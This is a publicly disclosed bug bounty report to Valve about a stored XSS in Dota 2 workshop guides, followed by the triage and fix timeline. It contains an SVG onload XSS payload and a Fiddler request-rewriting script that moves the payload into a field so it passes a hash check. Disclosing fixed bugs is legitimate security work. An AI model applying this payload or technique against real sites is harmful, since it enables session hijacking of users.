Stored XSS in the guide's GameplayVersion (www.dota2.com)
State Resolved (Closed)
Disclosed publicly 2019-01-07T20:03:56.643Z
Reported To
Weakness Cross-site Scripting (XSS) - Stored
Bounty $750
Collapse


Timeline
submitted a report to Valve .
2018-07-10T02:00:39.493Z

Hi, team!

The beginning of this issue looks like my previous report #369043, but this one will be much more interesting :) So let's go!

Steps to reproduce:

1) Open dota2 client and create new simple guide with XSS in the name.

2) Publish this guide on steam.

3) Now go to the Fiddler app and look at the request from dota2 client:

The XSS script placed in the title, the title displays a safe HTML on the site, so, for now nothing terrible happens.

4) Next I write some piece of code in the Fiddler app:

if (oSession.uriContains("/cloud/CB/")) {
    var strBody=oSession.GetRequestBodyAsString();       
    strBody=strBody.replace("mvc123<svg/onload=alert(document.domain)>","mvc123");
    strBody=strBody.replace("7.18","7.18<svg/onload=alert(document.domain)>");
    oSession.utilSetRequestBody(strBody);       
}

So I transfer the XSS script from "Title" to "GameplayVersion". I decided to go this way, since in this case the content length of build's file does not change and it successfully passes the hash sum comparison.

5) Now we return to the dota2 client, click "Edit" and change anything in the our build and publish it again. And we see that the PUT request was successful and the XSS data in it is arranged the way we wanted:

6) Next i follow to the Dota2 Workshop Manager.

And here we see our public file ID. This connection with the public guide files I was found in the preparation of the previous report, but I did not know how to apply it (before today).

7) Put this FileID into a link below and we get the public infected page:

http://www.dota2.com/workshop/builds/view?fileid=949580646106367888

And the result in the latest versions of Firefox and Chrome:

Sincerely, @mvc

Impact

As on any cross-site-scripting vulnerability. The top line would be that the attacker might steals cookies to abuse users session.

Regards,
Frans

doggos Activities::Comment
2018-07-10T20:19:36.923Z
Hi @mvc, Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @doggos


doggos Activities::BugTriaged
2018-07-10T20:21:37.623Z
Thank you for your submission! Your report has been validated, and it has been submitted to the appropriate remediation team for review. They will let the HackerOne triage team know the final ruling on this report, and if/when a fix will be implemented. The HackerOne triage team will follow-up after the remediation team has assessed the impact of this report. Please note that the status and severity are subject to change.


doggos Activities::ReportSeverityUpdated
2018-07-10T20:24:10.021Z


Activities::BountyAwarded
2018-07-12T00:00:03.794Z


jacobu Activities::BugResolved
2018-07-12T00:00:25.050Z
Thanks for the report! We have deployed a fix to our production systems. Please let us know if you are still able to reproduce the issue.


mvc Activities::Comment
2018-08-02T08:29:19.635Z
Hi, team! Can we full disclose this report?


mvc Activities::AgreedOnGoingPublic
2018-08-02T18:58:11.532Z


mvc Activities::Comment
2018-10-17T09:00:50.819Z
Hi, team! There are some problem with disclosure of this report? Third month after my request...


bgilmore Activities::AgreedOnGoingPublic
2019-01-07T20:03:56.597Z


bgilmore Activities::ReportBecamePublic
2019-01-07T20:03:56.665Z